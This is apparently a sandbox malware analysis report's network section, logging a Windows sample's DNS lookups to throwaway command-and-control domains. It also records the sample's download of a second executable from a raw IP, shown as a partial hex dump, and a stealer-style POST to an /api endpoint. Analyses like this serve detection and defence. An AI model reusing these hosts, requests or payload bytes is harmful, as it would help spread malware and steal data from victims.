                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.911287069 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.911432981 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.913764000 CET49707443192.168.2.8172.67.207.38
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.913801908 CET44349707172.67.207.38192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057718039 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057785988 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.057862997 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.058195114 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.058212996 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.274620056 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.274722099 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.322812080 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.322896004 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.323869944 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325624943 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325624943 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:33.325799942 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267287970 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267419100 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267503023 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267651081 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267676115 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267693996 CET49708443192.168.2.8104.21.16.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.267702103 CET44349708104.21.16.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291337013 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291405916 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291477919 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291872978 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.291887999 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.684823990 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.684901953 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.686717987 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.686750889 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.687000036 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.688301086 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:36.735347033 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462080002 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462110996 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462130070 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462157011 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462196112 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462215900 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.462244034 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633425951 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633487940 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633526087 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633563995 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.633614063 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663700104 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663765907 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663773060 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663796902 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663903952 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.663947105 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.664014101 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.664037943 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.664046049 CET49711443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:37.664052963 CET4434971123.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:11.544388056 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:11.855453968 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:12.464911938 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:13.683587074 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:16.121103048 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:21.011703968 CET4970680192.168.2.8176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:22:30.746115923 CET4970680192.168.2.8176.113.115.19

                                                                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.527055979 CET5431053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.828638077 CET53543101.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.679457903 CET5058353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.817603111 CET53505831.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.821765900 CET5074153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.963131905 CET53507411.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.916295052 CET5232153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET53523211.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.296520948 CET5457153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.437526941 CET53545711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.441299915 CET5186953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.579201937 CET53518691.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.582731009 CET5602353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.721262932 CET53560231.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.727477074 CET4957153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.865648985 CET53495711.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.868837118 CET5085553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.007689953 CET53508551.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.009440899 CET5924553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.148432970 CET53592451.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.151570082 CET5136653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.290503979 CET53513661.1.1.1192.168.2.8

                                                                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.527055979 CET192.168.2.81.1.1.10x2110Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.679457903 CET192.168.2.81.1.1.10x8a16Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.821765900 CET192.168.2.81.1.1.10xfb75Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:31.916295052 CET192.168.2.81.1.1.10x5077Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.296520948 CET192.168.2.81.1.1.10x338cStandard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.441299915 CET192.168.2.81.1.1.10xb9b8Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.582731009 CET192.168.2.81.1.1.10x3710Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.727477074 CET192.168.2.81.1.1.10x38e8Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.868837118 CET192.168.2.81.1.1.10xe4fStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.009440899 CET192.168.2.81.1.1.10xc679Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.151570082 CET192.168.2.81.1.1.10xc666Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.828638077 CET1.1.1.1192.168.2.80x2110No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:21.828638077 CET1.1.1.1192.168.2.80x2110No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.817603111 CET1.1.1.1192.168.2.80x8a16Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.963131905 CET1.1.1.1192.168.2.80xfb75No error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:29.963131905 CET1.1.1.1192.168.2.80xfb75No error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:32.056838989 CET1.1.1.1192.168.2.80x5077No error (0)deafeninggeh.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.437526941 CET1.1.1.1192.168.2.80x338cName error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.579201937 CET1.1.1.1192.168.2.80xb9b8Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.721262932 CET1.1.1.1192.168.2.80x3710Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:34.865648985 CET1.1.1.1192.168.2.80x38e8Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.007689953 CET1.1.1.1192.168.2.80xe4fName error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.148432970 CET1.1.1.1192.168.2.80xc679Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:35.290503979 CET1.1.1.1192.168.2.80xc666No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                    • post-to-me.com
                                                                                                                                                                                                                                                                                    • immureprech.biz
                                                                                                                                                                                                                                                                                    • deafeninggeh.biz
                                                                                                                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                                                                                                                    • 176.113.115.19

                                                                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.849706176.113.115.19803284C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:23.933777094 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                                                                                                                                                                                                                    User-Agent: ShareScreen
                                                                                                                                                                                                                                                                                    Host: 176.113.115.19
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258672953 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sun, 15 Dec 2024 08:20:25 GMT
                                                                                                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 15 Dec 2024 08:15:01 GMT
                                                                                                                                                                                                                                                                                    ETag: "58600-6294aa91c6503"
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Content-Length: 361984
                                                                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258775949 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                                                                    Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuu
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258866072 CET1236INData Raw: e8 cf 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 de 08 00 00 85 c0 74 0a e8 d5 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 7e 25 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b
                                                                                                                                                                                                                                                                                    Data Ascii: u9EttM^UEVFuc~%FHlHhN;HDtGDHpu"F;FDtFGDHpuFF@puHpF@F^]U3W;t3f;y9Mp8huM?Ex
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258946896 CET1236INData Raw: 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 ec 30 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 7a 30 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 64 30 00 00 59
                                                                                                                                                                                                                                                                                    Data Ascii: +CrwW0CY;sH;s;rPuz0YYuG;r@Pud0YYt1P4YluVYhEY3_^[Vjj /VlhujX^&3^jh%DD6%euYEEE`
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.258984089 CET1236INData Raw: 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d cc 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 7e f5 ff ff 83 26 00 59 83 c6 08 81 fe a8 42 44 00 7c dc be 88 41 44 00 5f 8b 06 85 c0 74 09
                                                                                                                                                                                                                                                                                    Data Ascii: 3@_^$AD3SDVADW>t~tWW~&YBD|AD_t~uPBD|^[UE4ADD]jh%D3G}394nDu$j'#hi YYu4AD9tnj*Y;uu3QjYY]9u,h
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259063005 CET1236INData Raw: 14 50 ff 35 80 b4 81 00 57 ff 35 34 6e 44 00 ff 15 dc 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 8c b4 81 00 10 8b 35 7c b4 81 00 a3 80 b4 81 00 6b f6 14 03 35 80 b4 81 00 68 c4 41 00 00 6a 08 ff 35 34 6e 44 00 ff 15 a8 10 44 00 89 46 10 3b c7 74 c7
                                                                                                                                                                                                                                                                                    Data Ascii: P5W54nDD;u3x5|k5hAj54nDDF;tjh hWDF;uvW54nDDN>~|F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWD
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259154081 CET1236INData Raw: 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 80 b4 81 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75
                                                                                                                                                                                                                                                                                    Data Ascii: ;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8tCUt|D#M#u)eHD9#U#uEUi
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259190083 CET1236INData Raw: 33 f6 46 33 db 89 5d e4 83 fe e0 77 69 83 3d 94 b4 81 00 03 75 4b 83 c6 0f 83 e6 f0 89 75 0c 8b 45 08 3b 05 84 b4 81 00 77 37 6a 04 e8 96 f2 ff ff 59 89 7d fc ff 75 08 e8 9c fa ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df
                                                                                                                                                                                                                                                                                    Data Ascii: 3F3]wi=uKuE;w7jY}uYEE_];tuWS6.;uaVj54nDD;uL9=0sDt3VYrE;PE3uj:Y;uE;t8-t"ttHt3
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259227037 CET1236INData Raw: 00 00 8d 75 ef 8a 0e 84 c9 0f 84 c2 00 00 00 0f b6 46 ff 0f b6 c9 e9 a6 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 96 29 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 e8 46 44 00 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45
                                                                                                                                                                                                                                                                                    Data Ascii: uFhCVP)Mk0uFDu*Ft(>EFDD;FG;v}FF>uuE}ur{CgjCCFDZf1Af0A@@JuL@;vFF~4C@IuCCSs
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.259388924 CET1236INData Raw: 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00 00 00 85 c0 74 03 50 ff d6 8d 5f 50 c7 45 08 06 00 00 00 81 7b f8 d0 47 44 00 74 09 8b 03 85 c0 74 03 50 ff d6 83 7b fc 00 74
                                                                                                                                                                                                                                                                                    Data Ascii: tPtPtPtP_PE{GDttP{tCtPMuP^[_]t7t3V0;t(W8YtVE>YuGDtVYY^3jhx&DT,GDFpt"~ltpluj Yg
                                                                                                                                                                                                                                                                                    Dec 15, 2024 09:20:25.378681898 CET1236INData Raw: e8 46 e4 ff ff 59 c7 45 fc 01 00 00 00 8b 7e 6c 85 ff 74 23 57 e8 f3 fa ff ff 59 3b 3d b0 48 44 00 74 14 81 ff d8 47 44 00 74 0c 83 3f 00 75 07 57 e8 ff f8 ff ff 59 c7 45 fc fe ff ff ff e8 1e 00 00 00 56 e8 74 d8 ff ff 59 e8 3a ef ff ff c2 04 00
                                                                                                                                                                                                                                                                                    Data Ascii: FYE~lt#WY;=HDtGDt?uWYEVtY:ujYujYVWpDV$DuVY^5HDhDWhDWoDhDWoDhDWoD=oD5DoDt=oDt=oDtu$D


                                                                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.849705104.21.56.704433284C:\Users\user\Desktop\AZCFTWko2q.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:23 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                                                                                                                                                                                                                    User-Agent: ShareScreen
                                                                                                                                                                                                                                                                                    Host: post-to-me.com
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:23 UTC796INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sun, 15 Dec 2024 08:20:23 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFrjQROX7DtgqR4tCUfxRN1do2mr%2BQ8QHqHRwXTiefNADlwzUnRKn2CglzCnpPeeSvYHrDLZ26lUiZ51Ru129cjOOOkhEa9Ar9fDCPSmjYsOwdnMxrGLofhziE6TkHbyUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8f25039ddeb8f795-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1652&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1749550&cwnd=178&unsent_bytes=0&cid=8543a9276c720235&ts=634&x=0"
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    1192.168.2.849707172.67.207.384435868C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:31 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                    Host: immureprech.biz
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                                                    2024-12-15 08:20:31 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sun, 15 Dec 2024 08:20:31 GMT
